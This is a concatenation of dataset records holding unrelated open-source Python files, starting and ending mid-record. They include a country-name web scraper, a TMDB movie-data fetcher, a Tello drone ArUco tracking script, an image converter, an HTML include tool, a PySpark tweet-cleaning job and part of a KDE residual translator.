Total match {matches} out of 
{len(OLDFILES)}\")\n\n\n\n\n\n\n\n\n\n","repo_name":"D-TACQ/ACQ400RELEASE","sub_path":"scripts/blacklist_redundant_fpgas.py","file_name":"blacklist_redundant_fpgas.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"17239842537","text":"#!/usr/bin/env python3\n#\n# ScrapeCountries.py\n#\n# Scrapes countries from http://www.nationsonline.org\n#\n# Note: Because the website fluctuates, this is not up to date and\n# tests won't all pass. However, I'm leaving this for the HTMLParser\n# example rather than parsing accuracy.\n#\n# Brandon Amos\n# 2013.04.26\n\nimport argparse # Argument parsing.\nimport html.parser # HTML parsing.\nimport urllib.parse # URL retrieval.\nimport urllib.request # URL retrieval.\nimport re # Regular expressions.\nimport pickle # Pickling.\n\n# Given a URL, this retrieves the content with a utf8 encoding\n# and uses the CountryParser to extract the country names from\n# the tables.\nclass URLParser():\n user_agent = (\"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) \"\n \"AppleWebKit/525.13 (KHTML, like Gecko)\"\n \"Chrome/0.2.149.29 Safari/525.13\")\n\n def __init__(self, url, numCols, extractionMap, exceptions):\n # Request the html.\n request = urllib.request.Request(url)\n request.add_header(\"User-Agent\",self.user_agent)\n try:\n response = urllib.request.urlopen(request)\n except:\n print(\"Error: Invalid URL. Exiting.\")\n exit()\n htmlContent = response.read().decode(\"utf8\")\n\n # Some files have
    in the middle of a tag,\n # and cause the parser to misinterpret the data.\n htmlContent = htmlContent.replace(\"
    \", \"\")\n\n # Parse the html.\n parser = CountryParser(numCols, extractionMap, exceptions, strict=False)\n htmlContent = parser.unescape(htmlContent) # Unescape HTML entities.\n parser.feed(htmlContent)\n parser.close()\n self.__countryData = parser.countryData\n\n @property\n def countryData(self):\n return self.__countryData\n\n# CountryParser keeps track of the HTML tags and appends country\n# names to a list.\nclass CountryParser(html.parser.HTMLParser):\n\n # Initialize the class variables.\n def __init__(self, numCols, extractionMap, exceptions, strict=False):\n super().__init__(strict=strict)\n\n self.__numCols = numCols\n self.__extractionMap = extractionMap\n self.__exceptions = exceptions\n\n # Maintain our position within tags.\n self.__in_tr = False\n self.__in_td = False\n\n # Within rows specifically, keep track of our index.\n # This helps because we know the country name always\n # occurs in the 0th position, and if we've exceeded\n # `numCols` positions, then the current row does not have\n # the data we want.\n self.__td_position = 0\n\n # Keep a record of possible data.\n self.__possible_data = []\n\n # The country names, successfully parsed.\n self.__countryData = []\n\n def handle_starttag(self, tag, attrs):\n if tag == \"tr\":\n self.__in_tr = True\n\n # Reset the possible data.\n self.__td_position = 0\n self.__possible_data = []\n for i in range(self.__numCols):\n self.__possible_data.append(\"\")\n elif tag == \"td\":\n self.__in_td = True\n\n def handle_endtag(self, tag):\n if tag == \"tr\":\n self.__in_tr = False\n\n if self.__td_position == self.__numCols:\n # Extract the columns and clean them up.\n extractedData = [self.__possible_data[i] for i in self.__extractionMap]\n for i in range(len(extractedData)):\n if extractedData[i]:\n extractedData[i] = extractedData[i].replace('\\n', ' ').strip()\n\n # Detect data with empty columns, unless it's an exception,\n # in which case we don't do this check.\n isIntersection = bool(set(extractedData) & set(self.__exceptions))\n if not isIntersection:\n for i in range(len(extractedData)):\n if not extractedData[i] or len(extractedData[i]) == 0:\n #print(extractedData)\n return\n\n self.__countryData.append(extractedData)\n elif tag == \"td\":\n self.__in_td = False\n self.__td_position += 1\n\n # If our criteria match, we know our position in the table.\n # Keep track of the data.\n def handle_data(self, data):\n if self.__in_tr:\n if self.__in_td:\n if self.__td_position < self.__numCols:\n self.__possible_data[self.__td_position] += data\n\n @property\n def countryData(self):\n return self.__countryData\n\n# Define usage when running this from the command line.\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Scrape countries from http://www.nationsonline.org.')\n parser.add_argument('url', type=str, help='The URL to scrape.')\n parser.add_argument('output', type=str, help='The output file.')\n parser.add_argument('-p', '--pickle', dest='p', action='store_true',\n help='Generate a pickle.')\n args = parser.parse_args()\n\n genPickle = args.p\n url = args.url\n outputFile = args.output\n\n # Default values.\n numPops = 0 # The number of irrelavant data values at the top to ignore.\n exceptions = [] # Legitamet country rows marked as erroneous.\n numCols = 3 # The number of columns.\n extractionMap = (0, 1, 2) # The subset of columns to use as output.\n\n # Consider the different cases for each URL.\n baseUrl = \".*nationsonline.org/oneworld/\"\n if re.match(baseUrl + 
\"countrynames_arabic.htm\", url):\n print(\"Parsing country names in Arabic.\")\n numCols = 5\n extractionMap = (1, 2, 4)\n exceptions = ['Cayman Islands', 'Falkland Islands', 'Montenegro',\n 'Saint Kitts and Nevis', 'Saint Vincent and the Grenadines',\n 'Tokelau', 'Western Sahara']\n elif re.match(baseUrl + \"country_names_in_chinese.htm\", url):\n print(\"Parsing country names in Chinese.\")\n numCols = 4\n extractionMap = (0, 1, 2, 3)\n exceptions = ['Tuvalu']\n numPops = 1\n elif re.match(baseUrl + \"country_code_list.htm\", url):\n print(\"Parsing country code list.\")\n numCols = 5\n extractionMap = (1, 2, 3, 4)\n elif re.match(baseUrl + \"countries_of_the_world.htm\", url):\n print(\"Parsing countries of the world.\")\n numCols = 5\n extractionMap = (1, 2, 3, 4)\n exceptions = ['Saint Kitts and Nevis',\n 'Saint Vincent and the Grenadines', 'Virgin Islands (British)']\n elif re.match(baseUrl + \"countrynames_german.htm\", url):\n print(\"Parsing country names in German.\")\n exceptions = ['Saint Kitts and Nevis',\n 'Saint Vincent and the Grenadines',\n 'South Georgia and South Sandwich Islands',\n 'Virgin Islands (British)',\n 'Western Sahara']\n elif re.match(baseUrl + \"countrynames_italian.htm\", url):\n print(\"Parsing country names in Italian.\")\n exceptions = ['French Southern Territories',\n 'Saint Kitts and Nevis',\n 'Saint Vincent and the Grenadines',\n 'South Georgia and South Sandwich Islands',\n 'U.S. Minor Outlying Islands',\n 'Virgin Islands (British)',\n 'Western Sahara']\n elif re.match(baseUrl + \"countrynames_russian.htm\", url):\n print(\"Parsing country names in Russian.\")\n exceptions = ['Saint Kitts and Nevis',\n 'Saint Vincent and the Grenadines',\n 'Western Sahara']\n elif re.match(baseUrl + \"countrynames_spanish.htm\", url):\n print(\"Parsing country names in Spanish.\")\n numCols = 5\n extractionMap = (1, 2, 3, 4)\n exceptions = ['Saint Kitts and Nevis',\n 'Saint Vincent and the Grenadines',\n 'Virgin Islands (British)']\n else:\n print(\"Unrecognized url. Using default (and likely incorrect) values.\")\n\n print(\"Using {0} columns overall and extracting columns {1}.\".format(\n numCols, extractionMap))\n\n # Parse the HTML and pop the irrelevant values from the results.\n parsedURL = URLParser(url, numCols, extractionMap, exceptions)\n countryData = parsedURL.countryData\n for i in range(numPops):\n countryData.pop(0)\n\n # Write the data to disk.\n if genPickle:\n f = open(args.output, 'wb')\n pickle.dump(countryData, f, pickle.HIGHEST_PROTOCOL)\n f.close()\n else:\n f = open(args.output, 'w', encoding=\"utf8\")\n for country in countryData:\n f.write('\\t'.join(map(str,country)))\n f.write('\\n')\n f.close()\n print(\"Finished extracting. 
Data written to '{0}'\".format(outputFile))\n","repo_name":"canpolat/python-scripts","sub_path":"python3/ScrapeCountries.py","file_name":"ScrapeCountries.py","file_ext":"py","file_size_in_byte":7972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"45"} +{"seq_id":"28201883059","text":"# let's import all the packages we need\r\n# requests: package used to query API and get the result back in Python\r\n# json: package used to read and convert JSON format\r\n# csv: package used to read and write csv\r\nfrom typing_extensions import runtime\r\nimport requests, json, csv, os\r\n\r\n# document all the parameters as variables\r\nAPI_key = \"\"\r\n# write a function to compose the query using the parameters provided\r\ndef get_data(API_key, Movie_ID):\r\n query = (\r\n \"https://api.themoviedb.org/3/movie/\"\r\n + str(Movie_ID)\r\n + \"?api_key=\"\r\n + API_key\r\n + \"&language=en-US\"\r\n )\r\n response = requests.get(query)\r\n if response.status_code == 200:\r\n # status code ==200 indicates the API query was successful\r\n array = response.json()\r\n text = json.dumps(array)\r\n return text\r\n else:\r\n return \"error\"\r\n\r\n\r\ndef write_file(filename, text, movie):\r\n dataset = json.loads(text)\r\n csvFile = open(filename, \"a\", encoding=\"utf-8\", errors=\"ignore\")\r\n csvwriter = csv.writer(csvFile)\r\n # unpack the result to access the \"collection name\" element\r\n try:\r\n collection_name = dataset[\"belongs_to_collection\"][\"name\"]\r\n except:\r\n # for movies that don't belong to a collection, assign null\r\n collection_name = None\r\n try:\r\n backdrop_path = dataset[\"backdrop_path\"]\r\n except:\r\n backdrop_path = None\r\n try:\r\n poster_path = dataset[\"poster_path\"]\r\n except:\r\n backdrop_path = None\r\n try:\r\n genre = dataset[\"genres\"][0][\"name\"]\r\n except:\r\n genre = None\r\n try:\r\n overview = dataset[\"overview\"]\r\n except:\r\n overview = None\r\n try:\r\n release = dataset[\"release_date\"]\r\n except:\r\n release = None\r\n try:\r\n Runtime = dataset[\"runtime\"]\r\n except:\r\n Runtime = None\r\n result = [\r\n movie,\r\n dataset[\"original_title\"],\r\n overview,\r\n genre,\r\n release,\r\n collection_name,\r\n backdrop_path,\r\n poster_path,\r\n Runtime,\r\n ]\r\n # write data\r\n csvwriter.writerow(result)\r\n print(result)\r\n csvFile.close()\r\n\r\n\r\n# write header to the file\r\ncsvFile = open(\"movie_collection_data.csv\", \"a\", encoding=\"utf-8\", errors=\"ignore\")\r\ncsvwriter = csv.writer(csvFile)\r\ncsvwriter.writerow(\r\n [\r\n \"ID\",\r\n \"Movie_name\",\r\n \"Overview\",\r\n \"Genres\",\r\n \"Release Date\",\r\n \"Collection_name\",\r\n \"backdrop_path\",\r\n \"poster_path\",\r\n \"Runtime\",\r\n ]\r\n)\r\ncsvFile.close()\r\nfor movie in range(10000, 10600):\r\n text = get_data(API_key, movie)\r\n # make sure your process breaks when the pull was not successful\r\n # it's easier to debug this way\r\n if text == \"error\":\r\n continue\r\n write_file(\"movie_collection_data.csv\", text, movie)\r\n","repo_name":"Taru-garg/theTVguide","sub_path":"utility/Data/movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"18136476034","text":"import numpy as np\nimport cv2\nimport cv2.aruco as aruco\nimport sys, time, math\nfrom StateMachine.DroneObject import DroneObject\n\n\n\n\n#Find Distance\n#Param: coordinates: np.array of 4 coordinates of the detected marker, from top left 
corner going clockwise\n #knownWidth: predefined width of teh marker\n #focalLength: predefined focalLength of camera (different for each camera)\n#return: distance (int)\n\ndef DistancetoCamera(coordinates, knownWidth, focalLength):\n pixel_width = abs(coordinates[0][0][0]-coordinates[0][1][0])**2 + abs(coordinates[0][0][1]-coordinates[0][1][1])**2\n pixel_width = pixel_width**0.5\n return (knownWidth*focalLength)/pixel_width\n\n#Determine Orientation\n#Param: TopPoint: Tuple for top point\n #BottomPoint: Tuple for bottom point\n#return: number between 0 to 360\ndef orientation (TopPoint, BottomPoint):\n dy = -(TopPoint[1] - BottomPoint[1])\n dx = (TopPoint[0] - BottomPoint[0])\n if (dx ==0): #special case, don't want to divide by 0!\n if (dy>0):\n return 90\n else:\n return 270\n\n\n angle = int(math.degrees(math.atan(dy/dx)))\n\n if (dy>0):\n if (dx < 0):\n angle = 180 + angle\n else:\n return angle\n else:\n if (dx < 0):\n angle += 180\n else:\n angle += 360\n\n\n return angle\n\n#Determine command based on orientation of the marker\n#Param: orientation, a number between 360\n#return: null\n\ndef StateTransition(orientation):\n if (orientation > 360 or orientation < 0):\n print(\"invalid orientation, orientation should be between 0 adn 360\")\n return\n\n if (orientation < 100 and orientation > 80):\n drone.on_event(\"take_off\")\n\n\n elif (orientation < 280 and orientation > 260):\n drone.on_event(\"land\")\n return\n\n#Draw HUD information on the screen for human operator\n#Param: frame: frame to write on\n #Distance: distance to camera\n #coordinates: 4 corners of the marker\n #angle: orientation of marker\n #center: center of marker\n #ids: ids of marker\n #corners: a list of coordinates for aruco.drawDectedMarkers\n#return: nothing\n\n\ndef Draw (frame, Distance, coordinates, angle, Center, ids, corners):\n\n cv2.putText(frame, ('Distance %d' % Distance), (10, 95), cv2.FONT_HERSHEY_SIMPLEX, .5, (255, 255, 255),\n 2, cv2.LINE_AA)\n cv2.circle(frame, Center, 2, (255, 0, 0), thickness=1)\n cv2.circle(frame, (int(coordinates[0][0][0]), int(coordinates[0][0][1])), 4, (255, 0, 0), thickness=-1)\n cv2.circle(frame, (int(coordinates[0][1][0]), int(coordinates[0][1][1])), 4, (255, 0, 0), thickness=-1)\n cv2.putText(frame, ('Orientation %d' % angle), (10, 60), cv2.FONT_HERSHEY_SIMPLEX, .5, (0, 0, 0),\n 2,\n cv2.LINE_AA)\n cv2.putText(frame, ('Center %d,%d' % Center), (10, 15), cv2.FONT_HERSHEY_SIMPLEX, .5, (0, 0, 0), 2,\n cv2.LINE_AA)\n cv2.putText(frame, ('id %s' % ids), (10, 35), cv2.FONT_HERSHEY_SIMPLEX, .5, (255, 255, 255), 2,\n cv2.LINE_AA)\n aruco.drawDetectedMarkers(frame, corners, borderColor=(255, 255, 255))\n return\n\n#Determines the amount of tilt of the marker\n#Param: state: state of the drone\n #frame: frame to draw on\n #coordinates: coordinates of the detected marker\n #orientation: orientation of the marker\n#Returns: ratio of the right side length over the left side length, 0 if nothing is detected\ndef Tilt(state, frame, coordinates, orientation):\n Ratio = 0\n if (str(state) != \"TrackState\"):\n return Ratio\n if (orientation > 140 and orientation < 220):\n LeftSide = ((coordinates[0][1][0] - coordinates[0][0][0]) ** 2 + (\n coordinates[0][1][1] - coordinates[0][0][1]) ** 2) ** 0.5\n RightSide = ((coordinates[0][2][0] - coordinates[0][3][0]) ** 2 + (\n coordinates[0][2][1] - coordinates[0][3][1]) ** 2) ** 0.5\n Ratio = (1.0* RightSide / LeftSide)\n cv2.putText(frame, (\"Ratio is %s \" % Ratio), (400, 15), cv2.FONT_HERSHEY_SIMPLEX, .5, (0, 0, 0), 2, cv2.LINE_AA)\n\n 
elif ((orientation > 310 and orientation <= 360) or (orientation >= 0 and orientation <= 30)):\n RightSide = ((coordinates[0][1][0] - coordinates[0][0][0]) ** 2 + (\n coordinates[0][1][1] - coordinates[0][0][1]) ** 2) ** 0.5\n LeftSide = ((coordinates[0][2][0] - coordinates[0][3][0]) ** 2 + (\n coordinates[0][2][1] - coordinates[0][3][1]) ** 2) ** 0.5\n Ratio = (1.0 * RightSide / LeftSide)\n cv2.putText(frame, (\"Ratio is %s\" % Ratio), (400, 15), cv2.FONT_HERSHEY_SIMPLEX, .5, (0, 0, 0), 2, cv2.LINE_AA)\n return Ratio\n\nif __name__ == \"__main__\":\n #Create drone object and set up communication\n drone = DroneObject()\n drone.setup()\n frame_read = drone.tello.get_frame_read()\n time.sleep(5)\n\n angle = 0\n KNOWN_WIDTH = 9.7\n FOCAL_LENGTH = 630\n tilt = 0\n\n while (True):\n #retrieve frame and convert to black and white\n frame = frame_read.frame\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n #Detect 6X6 marker\n aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250)\n parameters = aruco.DetectorParameters_create()\n corners, ids, rejectedImgPoints = aruco.detectMarkers(gray, aruco_dict, parameters=parameters)\n\n #if markers are detected\n if (len(corners)!=0):\n aruco.drawDetectedMarkers(frame, corners, ids, (0,0,0))\n\n #determine center of the marker\n coordinates = tuple(corners[0])\n centerY = int((coordinates[0][0][1] + coordinates[0][2][1]) / 2)\n centerX = int((coordinates[0][0][0] + coordinates[0][2][0]) / 2)\n Center = (centerX,centerY)\n\n #determine angle, distance, state command, and pass in drone command\n angle = orientation((int(coordinates[0][3][0]),int(coordinates[0][3][1])),(int(coordinates[0][0][0]), int(coordinates[0][0][1])) )\n Distance = DistancetoCamera(coordinates, KNOWN_WIDTH, FOCAL_LENGTH)\n StateTransition(angle)\n tilt = Tilt(drone.state, frame, coordinates, angle)\n drone.set_parameter(Center[0], Center[1], Distance, tilt)\n\n print (coordinates)\n #draw HUD for BGR and gray screen\n Draw(gray, Distance, coordinates, angle, Center, ids, corners )\n Draw(frame, Distance, coordinates, angle, Center, ids, corners)\n #send command to the drone\n drone.action()\n\n #print state info on the drone\n cv2.putText(frame, (\"Drone state: %s\" % drone.state), (600, 15), cv2.FONT_HERSHEY_SIMPLEX, .5,\n (255, 255, 255),\n 2, cv2.LINE_AA)\n cv2.putText(gray, (\"Drone state: %s\" % drone.state), (600, 15), cv2.FONT_HERSHEY_SIMPLEX, .5,\n (255, 255, 255),\n 2, cv2.LINE_AA)\n\n #show screen\n cv2.imshow('frame', frame)\n cv2.imshow('gray', gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n time.sleep(1/30)\n # When everything done, release the capture\n\n cv2.destroyAllWindows()\n sys.exit()\n","repo_name":"KhazanahAmericasInc/TrackingProject","sub_path":"TrackTelloAruco.py","file_name":"TrackTelloAruco.py","file_ext":"py","file_size_in_byte":7213,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"23298785159","text":"import os\n\nimport requests\nfrom PIL import Image\n\n\nclass Converter:\n\n def __init__(self, type_way, path_link, one_many, re_value, conv_from, conv_to):\n self.type_way = type_way\n self.path_link = path_link\n self.one_many = one_many\n self.re_value = re_value\n self.conv_from = conv_from\n self.conv_to = conv_to\n\n def convert(self):\n if self.type_way == 'u':\n self.url_image()\n if self.type_way == 't':\n if self.one_many == 'y':\n self.convert_one()\n else:\n self.convert_many()\n\n def resize_image(self, img):\n height, width = img.size\n height, width = int(height * 
self.re_value / 100), int(width * self.re_value / 100)\n img = img.resize((height, width))\n return img\n\n def convert_one(self):\n img = Image.open(self.path_link)\n new_dir = self.path_link[:self.path_link.rfind('.')]\n if self.re_value != -1:\n img = self.resize_image(img)\n img.save(new_dir + \".\" + self.conv_to)\n print(\"Изображение сохранено!\")\n\n def convert_many(self):\n images_list = list(filter(lambda x: x.endswith(self.conv_from), os.listdir(self.path_link)))\n new_dir = self.path_link + \"/converted/\"\n if not os.path.exists(new_dir):\n os.mkdir(new_dir)\n for image in images_list:\n img = Image.open(self.path_link + \"/\" + image)\n if self.re_value != -1:\n img = self.resize_image(img)\n img.save(new_dir + image[:image.find('.')] + \".\" + self.conv_to)\n print(\"Изображения сохранены в папке converted!\")\n\n def url_image(self):\n re = requests.get(self.path_link, stream=True).raw\n img = Image.open(re)\n print(\"Введите путь к папке для сохранения:\")\n new_dir = \"\"\n while 1:\n new_dir = input()\n if os.path.exists(new_dir):\n if os.path.isdir(new_dir):\n break\n else:\n print(\"Укажите путь только до папки:\")\n else:\n print(\"Путь не найден! Введите существующий путь:\")\n if self.re_value != -1:\n img = self.resize_image(img)\n img.save(new_dir + \"/new.\" + self.conv_to)\n print(f\"Изображение сохранено в выбранную папку c именем new.{self.conv_to}!\")\n","repo_name":"zina-frid/BMP-to-PNG","sub_path":"converter/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"74739114377","text":"import os, glob, re, warnings\nimport argparse\n\nfrom html_ssi.classes import PathType\n\n# Parser for CLI params\nparser = argparse.ArgumentParser(description=\"Script to add server side include functionality to HTML files.\")\nparser.add_argument(\"-s\", \"--source\", help=\"source directory (must container folder called '_includes' for the files to be included)\", required=True, type=PathType(exists=True, type='dir'))\nparser.add_argument(\"-d\", \"--destination\", help=\"destination directory\", required=True, type=PathType(exists=True, type='dir'))\nargs = parser.parse_args()\n\ninclude_str_exp = r'\\'\ninclude_file_exp = r'(?<=\\)'\ninclude_dir = '_includes/'\n\n# for each file, find all include statments\n# iterate through include statements and replace w/ contents from corresponding file, if it exists, otherwise skip & log error\n\nfor sourcefile in glob.iglob(vars(args)[\"source\"] + '**/*.html', recursive=True):\n\tif include_dir in sourcefile:\n\t\tcontinue\n\twith open(sourcefile) as file:\n\t\ts = file.read()\n\t\tincludes = re.findall(include_str_exp, s)\n\t\tfor include in includes:\n\t\t\ti = re.findall(include_file_exp, include)[0]\n\t\t\tprint(\">>> \" + sourcefile + \" < \" + \"_includes/\" + i)\n\t\t\ttry:\n\t\t\t\tf = open(vars(args)[\"source\"] + include_dir + i).read()\n\t\t\texcept Exception as e:\n\t\t\t\tprint(\">>>\" + sourcefile + \" is attempting to include file that cannot be opened\\n\", e)\n\t\t\ts = s.replace(include, f)\n\twith open(vars(args)[\"destination\"] + os.path.basename(sourcefile), \"w\") as file:\n\t\tfile.write(s)","repo_name":"kbitz/html-ssi","sub_path":"html_ssi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"13772688092","text":"\n\n\nimport string\n\nfrom 
nltk.corpus import stopwords\nimport json\nimport glob\nimport re\nimport spacy\nimport argparse\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import StringType\nfrom pyspark.sql.functions import col, unix_timestamp, concat, lit, udf\nfrom functools import partial\n\n\n\n\ndef remove_stops(text,stops):\n \n pattern = r'\\b\\d{1,2}/\\d{1,2}/\\d{4}\\b'\n text= re.sub(pattern, '', text)\n text=text.replace(\"\\n\",\" \")\n text=text.replace(\"-\",\" \")\n text=text.strip()\n text=text.lower()\n words=text.split()\n \n \n \n #rimozione stopwords\n final=[]\n for word in words:\n if word not in stops:\n \n final.append(word)\n final=\" \".join(final)\n\n #punti\n final=final.translate(str.maketrans(\"\",\"\",string.punctuation))\n #rimozione numeri\n final=\"\".join([i for i in final if not i.isdigit()])\n\n #eliminazione doppi \" \"\n while \" \" in final:\n final=final.replace(\" \",\" \")\n \n return (final)\n\n\n\n \ndef lemming_text( text):\n # Load the Italian language model\n nlp = spacy.load(\"it_core_news_sm\")\n # Process the text with spaCy\n doc = nlp(text)\n # Lemmatize each token in the text\n lemmas = [token.lemma_ for token in doc]\n # Print the lemmas\n text=\" \".join(lemmas)\n return text\n \n \ndef find_none_spaced_words(text):\n \n \n \n text_with_space = re.sub(r\"(\\w)([A-Z])\", r\"\\1 \\2\", text)\n\n \n return text_with_space\n\ndef delete_double_spaces(text):\n text_without_double_spaces = re.sub(r\"\\s+\", \" \", text)\n return text_without_double_spaces\n\ndef clean_text_from_emoj(tweet):\n\n # Remove emojis\n tweet = re.sub(r\"\\s+\", \" \", tweet.encode(\"ascii\", \"ignore\").decode(\"utf-8\"))\n\n # Remove emoticons\n emoticons = re.findall(r\"(?::|;|=)(?:-)?(?:\\)|\\(|D|P)\", tweet)\n tweet = re.sub(r\"\\s+\", \" \", tweet)\n for emoticon in emoticons:\n tweet = tweet.replace(emoticon, \"\")\n\n # Remove URLs\n tweet = re.sub(r\"http\\S+|www\\S+|https\\S+\", \"\", tweet, flags=re.MULTILINE)\n\n return tweet.strip() \n\n# Define a custom function to delete URLs from text\ndef delete_urls(text):\n url_pattern = r\"http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\\\(\\\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+\"\n cleaned_text = re.sub(url_pattern, \"\", text)\n return cleaned_text\n\ndef clean_text( text,stops):\n \n \n \n \n\n if type(text)==type(\"s\"):\n #rimozione di tutte le parole che non hanno lunghezza maggiore di 2\n parsed_text=clean_text_from_emoj(text)\n parsed_text=delete_urls(parsed_text)\n parsed_text=remove_stops(parsed_text,stops) #rimozione stopwords\n parsed_text=delete_double_spaces(parsed_text)\n #parsed_text=lemming_text(parsed_text) #lemming delle parole\n \n else:\n parsed_text=text\n \n \n\n return parsed_text\n\n#create parser and set its arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--input_path\", type=str, help=\"Input file paths\")\nparser.add_argument(\"--output_path\", type=str, help=\"Output folder path\")\n\nargs = parser.parse_args()\ninput_filepath, output_filepath = args.input_path, args.output_path\n\n\n#stop words inglesi di nltk\nstops=stopwords.words(\"english\")\n# Define a list of file paths\nfile_paths = input_filepath #tutti i file che verranno combinati\n\nspark = SparkSession.builder.appName(\"CSV Integration\").getOrCreate()\n\n# Read the first CSV file into a DataFrame\ndf = spark.read.csv(input_filepath, header=True, inferSchema=True)\n\ncustom_partial = partial(clean_text, stops=stops)\n\nparse_text_udf = udf(custom_partial, StringType())\n\n# Apply the custom parsing function to the 
\"text\" column and create a new column \"parsed_text\"\ndf_with_parsed_text = df.withColumn(\"parsed_text\", parse_text_udf(\"text\"))\n\n\n\n\nfinal=df_with_parsed_text.drop(*[\"text\"])\n# Write the processed DataFrame to a new CSV file\nfinal.write.csv(output_filepath, header=True)\n\n# Stop the SparkSession\nspark.stop()\n\n\n\n","repo_name":"magicWiss/BIG_DATA_TWITTER_ANALYSIS","sub_path":"Logics/3_DataProcessing/TopicModeling/Parsing/dataCleaning4topicModeling.py","file_name":"dataCleaning4topicModeling.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"37457734478","text":"#107商业技艺竞赛模拟试题\r\n#Problem 3: 子题2:模数 (Modulo)\r\n#余数小于0,不过在python中余数没有负的,VB有,所以本题型应该不会再出了\r\nn=int(input())\r\n\r\nfor i in range(0,n):\r\n dend,dsor=map(int,input().split(\",\"))\r\n r=dend%dsor\r\n\t\r\n if(r<0):#余数小于0,不过在python中余数没有负的,VB有\r\n print((dsor)+r)\r\n else:\r\n print(r)\r\n","repo_name":"yotrew/commercial_skill_competition","sub_path":"107術科模擬試題/problem3-2.py","file_name":"problem3-2.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"41"} +{"seq_id":"71339553724","text":"from __future__ import annotations\n\nfrom typing import Optional\n\nimport numpy as np\nimport pandas as pd\nfrom kats.consts import TimeSeriesData\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.neighbors import KernelDensity\n\n\nclass KDEResidualTranslator:\n _kde: Optional[KernelDensity] = None\n\n def __init__(\n self, ignore_below_frac: float = 0, ignore_above_frac: float = 1\n ) -> None:\n \"\"\"\n Translates residuals (difference between outcome and prediction)\n to false-alarm probability using kernel density estimation\n on the residuals.\n\n Args:\n ignore_below_frac: Lower quantile to ignore during training\n (makes the translator more robust to outliers); default 0.\n ignore_above_frac: Upper quantile to ignore during training\n (makes the translator more robust to outliers); default 1.\n\n Examples:\n\n .. code-block:: py\n\n # ts_data is some data\n y = ts_data\n # We create a prediction by a rolling window of length 7\n yhat = pd.DataFrame({\n \"value\": self._y.value.rolling(7).mean().shift(1),\n \"time\": self._y.time})\n yhat = TimeSeriesData(yhat)\n\n trn = KDEResidualTranslator()\n\n # We can transform outcomes to probabilities using y and y_hat\n trn = trn.fit(y=y, yhat=yhat)\n proba = trn.predict(y)\n\n # We can transform outcomes to probabilities using residuals\n residual = self._y - self._yhat\n trn = trn.fit(residual=residual)\n proba = trn.predict(residual=residual)\n \"\"\"\n if ignore_below_frac < 0 or ignore_above_frac > 1:\n raise ValueError(\"Illegal ignore fractions\")\n if ignore_below_frac > ignore_above_frac:\n raise ValueError(\"Illegal ignore fractions\")\n self._ignore_below_frac = ignore_below_frac\n self._ignore_above_frac = ignore_above_frac\n\n def fit(\n self,\n y: Optional[TimeSeriesData] = None,\n yhat: Optional[TimeSeriesData] = None,\n yhat_lower: Optional[TimeSeriesData] = None,\n yhat_upper: Optional[TimeSeriesData] = None,\n residual: Optional[TimeSeriesData] = None,\n ) -> KDEResidualTranslator:\n \"\"\"\n Fits a dataframe to a model of the residuals.\n\n Args:\n df: A pandas DataFrame containg the following columns:\n\n 1. Either\n a. `residual`, or\n b. `y` and `yhat` with optionally both `yhat_lower` and\n `yhat_upper`\n 2. 
At most one of `ds` and `ts`\n \"\"\"\n residual = self._get_residual(y, yhat, yhat_lower, yhat_upper, residual)\n\n value = residual.value\n mask = value > value.quantile(self._ignore_below_frac)\n # pyre-fixme[58]: `&` is not supported for operand types\n # `Union[pd.core.frame.DataFrame, pd.core.series.Series]` and\n # `Union[pd.core.frame.DataFrame, pd.core.series.Series]`.\n mask &= value < value.quantile(self._ignore_above_frac)\n value = value[mask]\n\n kde = KernelDensity(bandwidth=10.0, kernel=\"gaussian\")\n extent = value.quantile(0.95) - value.quantile(0.05)\n params = {\n \"kernel\": [\"gaussian\"],\n \"bandwidth\": np.linspace(extent / 1000, extent / 10, 1000),\n }\n search = RandomizedSearchCV(\n kde, params, random_state=0, scoring=lambda k, x: k.score_samples(x).sum()\n )\n best_params = search.fit(value.to_frame()).best_params_\n kde = KernelDensity(**best_params)\n kde.fit(value.to_frame())\n self._kde = kde\n return self\n\n @property\n def kde_(self) -> Optional[KernelDensity]:\n \"\"\"\n Returns:\n KernelDensity object fitted to the residuals.\n \"\"\"\n return self._kde\n\n def predict_proba(\n self,\n y: Optional[TimeSeriesData] = None,\n yhat: Optional[TimeSeriesData] = None,\n yhat_lower: Optional[TimeSeriesData] = None,\n yhat_upper: Optional[TimeSeriesData] = None,\n residual: Optional[TimeSeriesData] = None,\n ) -> TimeSeriesData:\n \"\"\"\n Predicts the probability of a residual\n\n Args:\n df: A pandas DataFrame containg the following columns:\n\n 1. Either\n a. `residual`, or\n b. `y` and `yhat` with optionally both `yhat_lower` and\n `yhat_upper`\n 2. At most one of `ds` and `ts`\n\n Returns:\n A series where there is a probability corresponding to\n each instance (row) in the input.\n \"\"\"\n proba = self.predict_log_proba(y, yhat, yhat_lower, yhat_upper, residual)\n proba.value = np.exp(proba.value)\n return proba\n\n def predict_log_proba(\n self,\n y: Optional[TimeSeriesData] = None,\n yhat: 